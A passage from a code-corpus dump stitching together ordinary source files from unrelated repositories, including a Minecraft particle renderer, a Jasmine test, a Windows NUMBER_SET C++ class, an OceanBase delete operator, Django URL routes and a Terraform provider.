GlStateManager.pushMatrix(); GlStateManager.disableLighting(); OpenGlHelper.setLightmapTextureCoords(OpenGlHelper.lightmapTexUnit, 260f, 260f); super.renderParticle(worldRendererIn, entityIn, partialTicks, rotationX, rotationZ, rotationYZ, rotationXY, rotationXZ); GlStateManager.popMatrix(); } @Override public int getBrightnessForRender(float brightness) { int i = super.getBrightnessForRender(brightness); float f = (float) particleAge / (float) particleMaxAge; f = f * f; f = f * f; int j = i & 255; int k = i >> 16 & 255; k = k + (int) (f * 15.0F * 16.0F); if (k > 240) { k = 240; } return j | k << 16 / 200; } @Override public void onUpdate() { prevPosX = posX; prevPosY = posY; prevPosZ = posZ; float f = (float) particleAge / (float) particleMaxAge; float f1 = -f + f * f * 2.0F; float f2 = 1.0F - f1; posX = portalPosX + motionX * f2; posY = portalPosY + motionY * f2 + (1.0F - f); posZ = portalPosZ + motionZ * f2; if (particleAge++ >= particleMaxAge) { setExpired(); } } @SideOnly(Side.CLIENT) public static class Factory implements IParticleFactory { @Override public Particle createParticle(int particleID, World worldIn, double xCoordIn, double yCoordIn, double zCoordIn, double xSpeedIn, double ySpeedIn, double zSpeedIn, int... p_178902_15_) { return new ParticleEvolvedEndermanPortal(worldIn, xCoordIn, yCoordIn, zCoordIn, xSpeedIn, ySpeedIn, zSpeedIn); } } }
thiagobfb/jasmine-standalone
spec/andCallTroughSpec.js
<gh_stars>0 describe('Testes do obejto and.callThrough', () => { let calculadora = { somar: function (n1, n2) { return n1 + n2; }, subtrair: function (n1, n2) { return n1 - n2; } }; beforeAll(() => { spyOn(calculadora, 'somar').and.callThrough(); spyOn(calculadora, 'subtrair'); }); it('deve executar o método somar original', () => { expect(calculadora.somar(1, 1)).toEqual(2); expect(calculadora.subtrair(2, 1)).toBeUndefined(); }); });
XuanYuan1122/momole
app/src/main/java/com/moemoe/lalala/presenter/BagContract.java
package com.moemoe.lalala.presenter; import com.moemoe.lalala.model.entity.BagDirEntity; import com.moemoe.lalala.model.entity.BagEntity; import com.moemoe.lalala.model.entity.FileEntity; import com.moemoe.lalala.model.entity.Image; import com.moemoe.lalala.model.entity.ShowFolderEntity; import java.util.ArrayList; /** * Created by yi on 2016/11/29. */ public interface BagContract { interface Presenter extends BasePresenter{ void openBag(String name,Image image,int type); void getBagInfo(String userId); void getFolderList(String userId,int index,String type); void createFolder(String folderName,int coin,Image cover,ArrayList<Object> items,String readType); void modifyFolder(String folderId,String folderName,int coin,Image cover,long size,String readType); void uploadFilesToFolder(String folderId,ArrayList<Object> items); void getFolderItemList(String folderId,int index); void checkSize(long size); void buyFolder(String folderId); void deleteFolder(ArrayList<String> ids); void followFolder(String folderId); void unFollowFolder(String folderId); void getFolder(String userId,String folderId); } interface View extends BaseView{ void openOrModifyBagSuccess(); void loadBagInfoSuccess(BagEntity entity); void loadFolderListSuccess(ArrayList<ShowFolderEntity> entities, boolean isPull); void createFolderSuccess(); void uploadFolderSuccess(); void loadFolderItemListSuccess(ArrayList<FileEntity> entities, boolean isPull); void onCheckSize(boolean isOk); void onBuyFolderSuccess(); void deleteFolderSuccess(); void modifyFolderSuccess(); void onFollowOrUnFollowFolderSuccess(boolean follow); void onLoadFolderSuccess(BagDirEntity entity); void onLoadFolderFail(); } }
npocmaka/Windows-Server-2003
base/fs/utils/ifsutil/src/numset.cxx
<reponame>npocmaka/Windows-Server-2003<filename>base/fs/utils/ifsutil/src/numset.cxx<gh_stars>10-100 #include <pch.cxx> #define _NTAPI_ULIB_ #define _IFSUTIL_MEMBER_ #include "ulib.hxx" #include "ifsutil.hxx" #include "numset.hxx" #include "iterator.hxx" DEFINE_EXPORTED_CONSTRUCTOR( NUMBER_SET, OBJECT, IFSUTIL_EXPORT ); DEFINE_CONSTRUCTOR( NUMBER_EXTENT, OBJECT ); VOID NUMBER_SET::Construct ( ) /*++ Routine Description: Constructor for NUMBER_SET. Arguments: None. Return Value: None. --*/ { _card = 0; _iterator = NULL; } VOID NUMBER_SET::Destroy( ) /*++ Routine Description: This routine returns the NUMBER_SET to its initial state. Arguments: None. Return Value: None. --*/ { _list.DeleteAllMembers(); _card = 0; DELETE(_iterator); } IFSUTIL_EXPORT NUMBER_SET::~NUMBER_SET( ) /*++ Routine Description: Destructor for NUMBER_SET. Arguments: None. Return Value: None. --*/ { Destroy(); } IFSUTIL_EXPORT BOOLEAN NUMBER_SET::Initialize( ) /*++ Routine Description: This routine initializes the stack for new input. Arguments: None. Return Value: FALSE - Failure. TRUE - Success. --*/ { Destroy(); if (!_list.Initialize() || !(_iterator = _list.QueryIterator())) { Destroy(); return FALSE; } return TRUE; } IFSUTIL_EXPORT BOOLEAN NUMBER_SET::Add( IN BIG_INT Number ) /*++ Routine Description: This routine adds 'Number' to the set. Arguments: Number - Supplies the number to add to the set. Return Value: FALSE - Failure. TRUE - Success. --*/ { PNUMBER_EXTENT p, pn; PNUMBER_EXTENT new_extent; BIG_INT next; DebugAssert(_iterator); _iterator->Reset(); while (p = (PNUMBER_EXTENT) _iterator->GetPrevious()) { if (p->Start <= Number) { break; } } if (p) { next = p->Start + p->Length; if (Number < next) { return TRUE; } if (Number == next) { p->Length += 1; _card += 1; if (pn = (PNUMBER_EXTENT) _iterator->GetNext()) { if (pn->Start == Number + 1) { p->Length += pn->Length; pn = (PNUMBER_EXTENT) _list.Remove(_iterator); DELETE(pn); } } return TRUE; } } if (p = (PNUMBER_EXTENT) _iterator->GetNext()) { if (Number + 1 == p->Start) { p->Start = Number; p->Length += 1; _card += 1; return TRUE; } } if (!(new_extent = NEW NUMBER_EXTENT)) { return FALSE; } new_extent->Start = Number; new_extent->Length = 1; if (!_list.Insert(new_extent, _iterator)) { DELETE(new_extent); return FALSE; } _card += 1; return TRUE; } IFSUTIL_EXPORT BOOLEAN NUMBER_SET::AddStart( IN BIG_INT Number ) /*++ Routine Description: This routine adds 'Number' to the set. Call this routine once before calling AddNext. NOTE: Do not insert other calls of this class in between AddStart and AddNext. Arguments: Number - Supplies the number to add to the set. Return Value: FALSE - Failure. TRUE - Success. --*/ { PNUMBER_EXTENT p, pn; PNUMBER_EXTENT new_extent; BIG_INT next; DebugAssert(_iterator); _iterator->Reset(); p = (PNUMBER_EXTENT) _iterator->GetPrevious(); while (p != NULL) { if (p->Start <= Number) { next = p->Start + p->Length; // if within range, then done if (Number < next) return TRUE; // if passed the range by 1, try to expand the range to include it if (Number == next) { p->Length += 1; _card += 1; // see if the next range can be merged with the expanded range if (pn = (PNUMBER_EXTENT) _iterator->GetNext()) { if (pn->Start == Number + 1) { p->Length += pn->Length; pn = (PNUMBER_EXTENT) _list.Remove(_iterator); DELETE(pn); } } p = (PNUMBER_EXTENT)_iterator->GetPrevious(); return TRUE; } // if less than the next range by 1, try to expand the range to // include it. There won't be a merge as there must be more than // one hole in between the two ranges if (p = (PNUMBER_EXTENT) _iterator->GetNext()) { if (p->Start <= Number) continue; if ((Number+1) == p->Start) { p->Start = Number; p->Length += 1; _card += 1; return TRUE; } } break; } else { // search backwards p = (PNUMBER_EXTENT) _iterator->GetPrevious(); if (p == NULL) { p = (PNUMBER_EXTENT) _iterator->GetNext(); DebugAssert(p); if (p && ((Number+1) == p->Start)) { p->Start = Number; p->Length += 1; _card += 1; return TRUE; } break; } } } if (!(new_extent = NEW NUMBER_EXTENT)) { return FALSE; } new_extent->Start = Number; new_extent->Length = 1; if (!_list.Insert(new_extent, _iterator)) { DELETE(new_extent); return FALSE; } _card += 1; p = (PNUMBER_EXTENT) _iterator->GetPrevious(); return TRUE; } IFSUTIL_EXPORT BOOLEAN NUMBER_SET::AddNext( IN BIG_INT Number ) /*++ Routine Description: This routine adds 'Number' to the set. Call this routine after calling AddStart once. This routine differs from Add ni the sense that it searches through each of the subset from where it last added instead of starting backwards like Add does. NOTE: Do not insert any other call of this class in between two AddNext calls. Arguments: Number - Supplies the number to add to the set. Return Value: FALSE - Failure. TRUE - Success. --*/ { PNUMBER_EXTENT p, pn; PNUMBER_EXTENT new_extent; BIG_INT next; DebugAssert(_iterator); if (!(p = (PNUMBER_EXTENT) _iterator->GetCurrent())) { _iterator->Reset(); p = (PNUMBER_EXTENT) _iterator->GetPrevious(); } while (p != NULL) { if (p->Start <= Number) { next = p->Start + p->Length; // if within range, then done if (Number < next) return TRUE; // if passed the range by 1, try to expand the range to include it if (Number == next) { p->Length += 1; _card += 1; // see if the next range can be merged with the expanded range if (pn = (PNUMBER_EXTENT) _iterator->GetNext()) { if (pn->Start == Number + 1) { p->Length += pn->Length; pn = (PNUMBER_EXTENT) _list.Remove(_iterator); DELETE(pn); } } p = (PNUMBER_EXTENT)_iterator->GetPrevious(); return TRUE; } // if less than the next range by 1, try to expand the range to // include it. There won't be a merge as there must be more than // one hole in between the two ranges if (p = (PNUMBER_EXTENT) _iterator->GetNext()) { if (p->Start <= Number) continue; if ((Number+1) == p->Start) { p->Start = Number; p->Length += 1; _card += 1; return TRUE; } } break; } else { // search backwards p = (PNUMBER_EXTENT) _iterator->GetPrevious(); if (p == NULL) { p = (PNUMBER_EXTENT) _iterator->GetNext(); DebugAssert(p); if (p && ((Number+1) == p->Start)) { p->Start = Number; p->Length += 1; _card += 1; return TRUE; } break; } } } if (!(new_extent = NEW NUMBER_EXTENT)) { return FALSE; } new_extent->Start = Number; new_extent->Length = 1; if (!_list.Insert(new_extent, _iterator)) { DELETE(new_extent); return FALSE; } _card += 1; p = (PNUMBER_EXTENT) _iterator->GetPrevious(); return TRUE; } IFSUTIL_EXPORT BOOLEAN NUMBER_SET::Add( IN BIG_INT Start, IN BIG_INT Length ) /*++ Routine Description: This routine adds the range of numbers to the set. Arguments: Start - Supplies the first number to add to the set. Length - Supplies the length of the run to add. Return Value: FALSE - Failure. TRUE - Success. --*/ { BIG_INT i, sup; BOOLEAN r; sup = Start + Length; r = TRUE; for (i = Start; i < sup; i += 1) { r = Add(i) && r; } return r; } IFSUTIL_EXPORT BOOLEAN NUMBER_SET::Add( IN PCNUMBER_SET NumberSet ) /*++ Routine Description: This routine adds all of the elements in the given number set to this one. Arguments: NumberSet - Supplies the numbers to add. Return Value: FALSE - Failure. TRUE - Success. --*/ { ULONG i, n; BIG_INT s, l; n = NumberSet->QueryNumDisjointRanges(); for (i = 0; i < n; i++) { NumberSet->QueryDisjointRange(i, &s, &l); if (!Add(s, l)) { return FALSE; } } return TRUE; } IFSUTIL_EXPORT BOOLEAN NUMBER_SET::CheckAndAdd( IN BIG_INT Number, OUT PBOOLEAN Duplicate ) /*++ Routine Description: This routine adds 'Number' to the set. Arguments: Number - Supplies the number to add to the set. Return Value: FALSE - Failure. TRUE - Success. --*/ { PNUMBER_EXTENT p, pn; PNUMBER_EXTENT new_extent; BIG_INT next; DebugAssert(_iterator); DebugAssert(Duplicate); *Duplicate = FALSE; _iterator->Reset(); while (p = (PNUMBER_EXTENT) _iterator->GetPrevious()) { if (p->Start <= Number) { break; } } if (p) { next = p->Start + p->Length; if (Number < next) { *Duplicate = TRUE; return TRUE; } if (Number == next) { p->Length += 1; _card += 1; if (pn = (PNUMBER_EXTENT) _iterator->GetNext()) { if (pn->Start == Number + 1) { p->Length += pn->Length; pn = (PNUMBER_EXTENT) _list.Remove(_iterator); DELETE(pn); } } return TRUE; } } if (p = (PNUMBER_EXTENT) _iterator->GetNext()) { if (Number + 1 == p->Start) { p->Start = Number; p->Length += 1; _card += 1; return TRUE; } } if (!(new_extent = NEW NUMBER_EXTENT)) { return FALSE; } new_extent->Start = Number; new_extent->Length = 1; if (!_list.Insert(new_extent, _iterator)) { DELETE(new_extent); return FALSE; } _card += 1; return TRUE; } IFSUTIL_EXPORT BOOLEAN NUMBER_SET::Remove( IN BIG_INT Number ) /*++ Routine Description: This routine removes a number from the number set. Arguments: Number - Supplies the number to remove. Routine Description: FALSE - Failure. TRUE - Success. --*/ { PNUMBER_EXTENT p; PNUMBER_EXTENT new_extent; BIG_INT next, new_length; DebugAssert(_iterator); _iterator->Reset(); while (p = (PNUMBER_EXTENT) _iterator->GetNext()) { if (p->Start > Number) { break; } } if (p = (PNUMBER_EXTENT) _iterator->GetPrevious()) { next = p->Start + p->Length; if (p->Start == Number) { p->Start += 1; p->Length -= 1; _card -= 1; if (p->Length == 0) { p = (PNUMBER_EXTENT) _list.Remove(_iterator); DELETE(p); } return TRUE; } if (Number + 1 == next) { p->Length -= 1; _card -= 1; return TRUE; } if (Number < next) { if (!(new_extent = NEW NUMBER_EXTENT)) { return FALSE; } _iterator->GetNext(); if (!_list.Insert(new_extent, _iterator)) { DELETE(new_extent); return FALSE; } new_length = Number - p->Start; new_extent->Start = Number + 1; new_extent->Length = p->Length - 1 - new_length; p->Length = new_length; _card -= 1; } } return TRUE; } IFSUTIL_EXPORT BOOLEAN NUMBER_SET::RemoveAll( ) { PNUMBER_EXTENT p; DebugAssert(_iterator); _iterator->Reset(); if ((p = (PNUMBER_EXTENT) _iterator->GetNext())) do { p = (PNUMBER_EXTENT) _list.Remove(_iterator); DELETE(p); } while ((p=(PNUMBER_EXTENT)_iterator->GetCurrent())); _card = 0; return TRUE; } IFSUTIL_EXPORT BOOLEAN NUMBER_SET::CheckAndRemove( IN BIG_INT Number, OUT PBOOLEAN DoesExists ) /*++ Routine Description: This routine removes a number from the number set. Arguments: Number - Supplies the number to remove. DoesExists - TRUE if Number was found in the set Routine Description: FALSE - Failure. TRUE - Success. --*/ { PNUMBER_EXTENT p; PNUMBER_EXTENT new_extent; BIG_INT next, new_length; DebugAssert(_iterator); DebugAssert(DoesExists); *DoesExists = FALSE; _iterator->Reset(); while (p = (PNUMBER_EXTENT) _iterator->GetNext()) { if (p->Start > Number) { break; } } if (p = (PNUMBER_EXTENT) _iterator->GetPrevious()) { next = p->Start + p->Length; if (p->Start == Number) { p->Start += 1; p->Length -= 1; _card -= 1; *DoesExists = TRUE; if (p->Length == 0) { p = (PNUMBER_EXTENT) _list.Remove(_iterator); DELETE(p); } return TRUE; } if (Number + 1 == next) { p->Length -= 1; _card -= 1; *DoesExists = TRUE; return TRUE; } if (Number < next) { if (!(new_extent = NEW NUMBER_EXTENT)) { return FALSE; } _iterator->GetNext(); if (!_list.Insert(new_extent, _iterator)) { DELETE(new_extent); return FALSE; } new_length = Number - p->Start; new_extent->Start = Number + 1; new_extent->Length = p->Length - 1 - new_length; p->Length = new_length; _card -= 1; *DoesExists = TRUE; } } return TRUE; } IFSUTIL_EXPORT BOOLEAN NUMBER_SET::Remove( IN BIG_INT Start, IN BIG_INT Length ) /*++ Routine Description: This routine removes the given range from the number set. Arguments: Start - Supplies the beginning of the range. Length - Supplies the length of the range. Routine Description: FALSE - Failure. TRUE - Success. --*/ { BIG_INT i, sup; BOOLEAN r; sup = Start + Length; r = TRUE; for (i = Start; i < sup; i += 1) { r = Remove(i) && r; } return r; } IFSUTIL_EXPORT BOOLEAN NUMBER_SET::Remove( IN PCNUMBER_SET NumberSet ) /*++ Routine Description: This routine removes all of the elements in the given number set from this one. Arguments: NumberSet - Supplies the numbers to remove. Return Value: FALSE - Failure. TRUE - Success. --*/ { ULONG i, n; BIG_INT s, l; n = NumberSet->QueryNumDisjointRanges(); for (i = 0; i < n; i++) { NumberSet->QueryDisjointRange(i, &s, &l); if (!Remove(s, l)) { return FALSE; } } return TRUE; } IFSUTIL_EXPORT BIG_INT NUMBER_SET::QueryNumber( IN BIG_INT Index ) CONST /*++ Routine Description: This routine returns the Nth number contained in this set. Arguments: Index - Supplies a zero-based index into the ordered set. Return Value: The Nth number in this set. --*/ { PNUMBER_EXTENT p; BIG_INT r; BIG_INT count; DebugAssert(Index < _card); _iterator->Reset(); count = 0; while (p = (PNUMBER_EXTENT) _iterator->GetNext()) { count += p->Length; if (count > Index) { break; } } DebugAssert(p); return p->Start + Index - (count - p->Length); } IFSUTIL_EXPORT BOOLEAN NUMBER_SET::DoesIntersectSet( IN BIG_INT Start, IN BIG_INT Length ) CONST /*++ Routine Description: This routine computes whether or not the range specified intersects the current number set. This routine will return FALSE if the intersection is empty, TRUE otherwise. Arguments: Start - Supplies the start of the range. Length - Supplies the length of the range. Return Value: FALSE - The specified range does not intersect the number set. TRUE - The specified range makes a non-empty intersection with the number set. --*/ { PNUMBER_EXTENT p; BIG_INT pnext, next; DebugAssert(_iterator); if (Length == 0) { return FALSE; } next = Start + Length; _iterator->Reset(); while (p = (PNUMBER_EXTENT) _iterator->GetNext()) { pnext = p->Start + p->Length; if (Start >= p->Start) { if (Start < pnext) { return TRUE; } } else { if (next > p->Start) { return TRUE; } } } return FALSE; } IFSUTIL_EXPORT VOID NUMBER_SET::QueryDisjointRange( IN ULONG Index, OUT PBIG_INT Start, OUT PBIG_INT Length ) CONST /*++ Routine Description: This routine returns the 'Index'th disjoint range. (This is zero based). Arguments: Index - Supplies the index of the disjoint range. Start - Returns the start of the disjoint range. Length - Returns the length of the disjoint range. Return Value: None. --*/ { ULONG i; PNUMBER_EXTENT p; DebugAssert(_iterator); _iterator->Reset(); for (i = 0; i <= Index; i++) { p = (PNUMBER_EXTENT) _iterator->GetNext(); } DebugAssert(p); DebugAssert(Start); DebugAssert(Length); *Start = p->Start; *Length = p->Length; } IFSUTIL_EXPORT BOOLEAN NUMBER_SET::QueryContainingRange( IN BIG_INT Number, OUT PBIG_INT Start, OUT PBIG_INT Length ) CONST /*++ Routine Description: This routine returns the range that contains the given number. Arguments: Number - Supplies the number. Start - Returns the start of the range. Length - Returns the length of the range. Return Value: FALSE - The given number was not in the set. TRUE - Success. --*/ { PNUMBER_EXTENT p; DebugAssert(_iterator); _iterator->Reset(); while (p = (PNUMBER_EXTENT) _iterator->GetPrevious()) { if (p->Start <= Number) { break; } } if (!p || Number >= p->Start + p->Length) { return FALSE; } *Start = p->Start; *Length = p->Length; return TRUE; }
lingyunan0510/VIC
vic/drivers/python/vic/pycompat.py
<reponame>lingyunan0510/VIC # -*- coding: utf-8 -*- import sys PY3 = sys.version_info[0] >= 3 if PY3: basestring = str unicode_type = str bytes_type = bytes def iteritems(d): return iter(d.items()) def itervalues(d): return iter(d.values()) pyrange = range pyzip = zip pylong = int from configparser import SafeConfigParser else: # Python 2 basestring = basestring unicode_type = unicode bytes_type = str def iteritems(d): return d.iteritems() def itervalues(d): return d.itervalues() pyrange = xrange from itertools import izip as pyzip pylong = long from ConfigParser import SafeConfigParser try: from cyordereddict import OrderedDict except ImportError: try: from collections import OrderedDict except ImportError: from ordereddict import OrderedDict
ctc316/algorithm-python
Lintcode/Ladder_1_Algorithm/09. Data Structure - Interval, Array & Matrix/393. Best Time to Buy and Sell Stock IV.py
<reponame>ctc316/algorithm-python class Solution: """ @param K: An integer @param prices: An integer array @return: Maximum profit """ def maxProfit(self, K, prices): n = len(prices) if n < 2: return 0 # equals to unlimited transactions if K >= n / 2: profit = 0 for i in range(1, n): if prices[i] > prices[i - 1]: profit += prices[i] - prices[i - 1] return profit # mustsell[i][j]: 前i天,至多进行j次交易,第i天必须sell的最大获益,只留[i - 1][j] # globalbest[i][j]: 前i天,至多进行j次交易,第i天可以不sell的最大获益,只留[i - 1][j] mustsell = [0 for _ in range(K + 1)] globalbest = [0 for _ in range(K + 1)] for i in range(1, n): diff = prices[i] - prices[i - 1] for j in range(K, 0, -1): # 比較全局中少一次+此次交易 與 前一天的交易延到今天賣 mustsell[j] = max(globalbest[j - 1] + diff, mustsell[j] + diff) globalbest[j] = max(mustsell[j], globalbest[j]) return globalbest[K]
wangcy6/weekly_read
code_reading/oceanbase-master/src/sql/engine/dml/ob_multi_part_delete_op.cpp
/** * Copyright (c) 2021 OceanBase * OceanBase CE is licensed under Mulan PubL v2. * You can use this software according to the terms and conditions of the Mulan PubL v2. * You may obtain a copy of Mulan PubL v2 at: * http://license.coscl.org.cn/MulanPubL-2.0 * THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, * EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, * MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE. * See the Mulan PubL v2 for more details. */ #define USING_LOG_PREFIX SQL_ENG #include "sql/engine/dml/ob_multi_part_delete_op.h" #include "sql/engine/ob_physical_plan_ctx.h" #include "sql/engine/ob_exec_context.h" #include "sql/executor/ob_mini_task_executor.h" #include "sql/engine/expr/ob_expr_calc_partition_id.h" #include "sql/engine/dml/ob_table_modify.h" namespace oceanbase { using namespace common; using namespace share::schema; namespace sql { OB_SERIALIZE_MEMBER((ObMultiPartDeleteSpec, ObTableDeleteSpec)); int ObMultiPartDeleteOp::inner_open() { int ret = OB_SUCCESS; bool got_row = false; ObTaskExecutorCtx* executor_ctx = GET_TASK_EXECUTOR_CTX(ctx_); ObSQLSessionInfo* my_session = GET_MY_SESSION(ctx_); if (OB_FAIL(init_multi_dml_ctx( ctx_, MY_SPEC.table_dml_infos_, MY_SPEC.get_phy_plan(), NULL /*subplan_root*/, MY_SPEC.se_subplan_root_))) { LOG_WARN("init multi dml ctx failed", K(ret)); } // if (OB_SUCC(ret)) { // const ObTableDMLInfo &first_dml_info = table_dml_infos_.at(0); // const ObGlobalIndexDMLInfo &first_index_dml_info = first_dml_info.index_infos_.at(0); // const ObTableModify *first_sub_delete = first_index_dml_info.dml_subplans_.at(DELETE_OP).subplan_root_; // if (OB_NOT_NULL(first_sub_delete) && first_sub_delete->get_trigger_args().count() > 0) { // OZ(delete_ctx->init_trigger_params(first_sub_delete->get_trigger_event(), // first_sub_delete->get_all_timing_points(), // first_sub_delete->get_trigger_columns().get_projector(), // first_sub_delete->get_trigger_columns().get_count())); // } // } if (OB_FAIL(ret)) { } else if (OB_FAIL(ObTableModifyOp::inner_open())) { LOG_WARN("open child operator failed", K(ret)); } else if (OB_FAIL(init_returning_store())) { LOG_WARN("init returning row store failed", K(ret)); } else if (OB_FAIL(shuffle_delete_row(got_row))) { LOG_WARN("shuffle delete row failed", K(ret)); } else if (!got_row) { // do nothing } else if (OB_FAIL(ObTableModify::extend_dml_stmt(ctx_, MY_SPEC.table_dml_infos_, table_dml_ctxs_))) { LOG_WARN("extend dml stmt failed", K(ret)); } else if (OB_FAIL(multi_dml_plan_mgr_.build_multi_part_dml_task())) { LOG_WARN("build multi partition dml task failed", K(ret)); } else { ObIArray<ObTaskInfo*>& task_info_list = multi_dml_plan_mgr_.get_mini_task_infos(); const ObMiniJob& subplan_job = multi_dml_plan_mgr_.get_subplan_job(); bool table_need_first = multi_dml_plan_mgr_.table_need_first(); ObMiniTaskResult result; ObMultiDMLInfo::ObIsMultiDMLGuard guard(*ctx_.get_physical_plan_ctx()); if (OB_FAIL(mini_task_executor_.execute(ctx_, subplan_job, task_info_list, table_need_first, result))) { LOG_WARN("execute multi table dml task failed", K(ret)); } } return ret; } int ObMultiPartDeleteOp::inner_close() { ObPhysicalPlanCtx* plan_ctx = GET_PHY_PLAN_CTX(ctx_); int wait_ret = mini_task_executor_.wait_all_task(plan_ctx->get_timeout_timestamp()); int close_ret = ObTableModifyOp::inner_close(); if (OB_SUCCESS != wait_ret || OB_SUCCESS != close_ret) { LOG_WARN("inner close failed", K(wait_ret), K(close_ret)); } return (OB_SUCCESS == close_ret) ? wait_ret : close_ret; } int ObMultiPartDeleteOp::shuffle_delete_row(bool& got_row) { int ret = OB_SUCCESS; ObTaskExecutorCtx* task_ctx = GET_TASK_EXECUTOR_CTX(ctx_); ObPhysicalPlanCtx* plan_ctx = GET_PHY_PLAN_CTX(ctx_); ObSqlCtx* sql_ctx = NULL; got_row = false; CK(OB_NOT_NULL(sql_ctx = ctx_.get_sql_ctx())); CK(OB_NOT_NULL(sql_ctx->schema_guard_)); CK(OB_NOT_NULL(MY_SPEC.get_phy_plan())); while (OB_SUCC(ret) && OB_SUCC(inner_get_next_row())) { LOG_DEBUG("inner get next row", K(ObToStringExprRow(eval_ctx_, child_->get_spec().output_))); for (int64_t k = 0; OB_SUCC(ret) && k < MY_SPEC.table_dml_infos_.count(); ++k) { clear_evaluated_flag(); const ObArrayWrap<ObGlobalIndexDMLInfo>& global_index_infos = MY_SPEC.table_dml_infos_.at(k).index_infos_; ObArrayWrap<ObGlobalIndexDMLCtx>& global_index_ctxs = table_dml_ctxs_.at(k).index_ctxs_; // ObTableModifySpec *sub_delete = // global_index_ctxs.at(0).se_subplans_.at(DELETE_OP).subplan_root_; // CK(OB_NOT_NULL(sub_delete)); // OZ(TriggerHandle::init_param_old_row(*sub_delete, *delete_ctx, *old_row), *old_row); // OX(LOG_DEBUG("TRIGGER", K(*old_row), K(delete_ctx->tg_old_row_))); // OZ(TriggerHandle::do_handle_before_row(*sub_delete, *delete_ctx, NULL), *old_row); CK(!global_index_infos.empty()); CK(!global_index_ctxs.empty()); if (MY_SPEC.is_returning_) { OZ(returning_datum_store_.add_row(MY_SPEC.output_, &eval_ctx_)); } if (OB_SUCC(ret)) { const SeDMLSubPlanArray& primary_dml_subplans = global_index_ctxs.at(0).se_subplans_; if (MY_SPEC.table_dml_infos_.at(k).need_check_filter_null_) { bool is_null = false; if (OB_FAIL(check_rowkey_is_null(primary_dml_subplans.at(DELETE_OP).access_exprs_, MY_SPEC.table_dml_infos_.at(k).rowkey_cnt_, is_null))) { LOG_WARN("check rowkey is null failed", K(ret), K(MY_SPEC.table_dml_infos_), K(k)); } else if (is_null) { continue; } } if (OB_SUCC(ret)) { bool is_distinct = false; if (OB_FAIL(check_rowkey_whether_distinct(primary_dml_subplans.at(DELETE_OP).access_exprs_, MY_SPEC.table_dml_infos_.at(k).rowkey_cnt_, MY_SPEC.table_dml_infos_.at(k).distinct_algo_, table_dml_ctxs_.at(k).se_rowkey_dist_ctx_, is_distinct))) { LOG_WARN("check rowkey whether distinct failed", K(ret)); } else if (!is_distinct) { continue; } } } ObTableModifySpec* delete_spec = global_index_infos.at(0).se_subplans_.at(DELETE_OP).subplan_root_; CK(OB_NOT_NULL(delete_spec)); OZ(ForeignKeyHandle::do_handle_old_row(*this, delete_spec->fk_args_, child_->get_spec().output_)); // OZ(TriggerHandle::do_handle_after_row(*sub_delete, *delete_ctx), *old_row); for (int64_t i = 0; OB_SUCC(ret) && i < global_index_infos.count(); ++i) { clear_evaluated_flag(); const ObExpr* calc_part_id_expr = global_index_infos.at(i).calc_part_id_exprs_.at(0); ObIArray<int64_t>& part_ids = global_index_ctxs.at(i).partition_ids_; const SeDMLSubPlanArray& se_subplans = global_index_ctxs.at(i).se_subplans_; int64_t part_idx = OB_INVALID_INDEX; CK(1 == global_index_infos.at(i).calc_part_id_exprs_.count()); CK(DML_OP_CNT == se_subplans.count()); OZ(calc_part_id(calc_part_id_expr, part_ids, part_idx)); if (OB_SUCC(ret)) { if (OB_FAIL(multi_dml_plan_mgr_.add_part_row(k, i, part_idx, DELETE_OP, se_subplans.at(0).access_exprs_))) { LOG_WARN("add row to dynamic mini task scheduler failed", K(ret)); } else { LOG_DEBUG("shuffle delete row", K(k), K(part_idx), K(part_ids), K(i), K(ObToStringExprRow(eval_ctx_, se_subplans.at(0).access_exprs_))); } } } // for global_index_infos } // for table_dml_infos got_row = true; plan_ctx->add_affected_rows(1); } if (OB_ITER_END == ret) { ret = OB_SUCCESS; } if (OB_SUCC(ret) && MY_SPEC.is_returning_) { bool need_dump = false; OZ(returning_datum_store_.finish_add_row(need_dump)); OZ(returning_datum_iter_.init(&returning_datum_store_, ObChunkDatumStore::BLOCK_SIZE)); } if (OB_FAIL(ret)) { LOG_WARN("get next row failed", K(ret)); } return ret; } int ObMultiPartDeleteOp::inner_get_next_row() { clear_evaluated_flag(); return child_->get_next_row(); } int ObMultiPartDeleteOp::get_next_row() { int ret = OB_SUCCESS; if (!MY_SPEC.is_returning_) { ret = OB_ITER_END; } else { ret = returning_datum_iter_.get_next_row(MY_SPEC.output_, eval_ctx_); } return ret; } } // namespace sql } // namespace oceanbase
ochui/recharge-me
recharge/urls.py
from django.contrib import admin from django.urls import path, include from django.contrib.sitemaps.views import sitemap from .sitemaps import StaticViewSitemap, TopicSitemap, StaticAuthViewSitemap, CategorySitemap from .views import LandingView, AboutView, ContactView, PrivacyView, TosView sitemaps = { 'static': StaticViewSitemap, 'topics': TopicSitemap, 'category': CategorySitemap, 'auth': StaticAuthViewSitemap, } urlpatterns = [ path('', LandingView.as_view(), name='landing_page'), path('about', AboutView.as_view(), name='about_page'), path('contact', ContactView.as_view(), name='contact_page'), path('policies', PrivacyView.as_view(), name='policies'), path('terms', TosView.as_view(), name='tos'), path('admin/', admin.site.urls), path('accounts/', include('allauth.urls')), path('accounts/', include('accounts.urls')), path('forum/', include('spirit.urls')), path('accounts/avatar/', include('avatar.urls')), path('accounts/notifications/', include('notifications.urls', namespace='notifications')), path('sitemap.xml', sitemap, {'sitemaps': sitemaps}, name='django.contrib.sitemaps.views.sitemap'), path('robots.txt', include('robots.urls')), path('ads/', include('ads.urls')), ]
yamamoto-febc/terraform-provider-rke
rke/provider.go
<gh_stars>100-1000 package rke import ( "github.com/hashicorp/terraform-plugin-sdk/helper/schema" "github.com/hashicorp/terraform-plugin-sdk/terraform" ) // Provider returns a terraform.ResourceProvider. func Provider() terraform.ResourceProvider { return &schema.Provider{ Schema: map[string]*schema.Schema{ "debug": { Type: schema.TypeBool, Optional: true, DefaultFunc: schema.EnvDefaultFunc("RKE_DEBUG", false), }, "log_file": { Type: schema.TypeString, Optional: true, DefaultFunc: schema.EnvDefaultFunc("RKE_LOG_FILE", ""), }, }, ResourcesMap: map[string]*schema.Resource{ "rke_cluster": resourceRKECluster(), }, DataSourcesMap: map[string]*schema.Resource{}, ConfigureFunc: providerConfigure, } } func providerConfigure(d *schema.ResourceData) (interface{}, error) { config := &Config{ Debug: d.Get("debug").(bool), LogFile: d.Get("log_file").(string), } config.initLogger() return config, nil }
robertotambunan/tweather
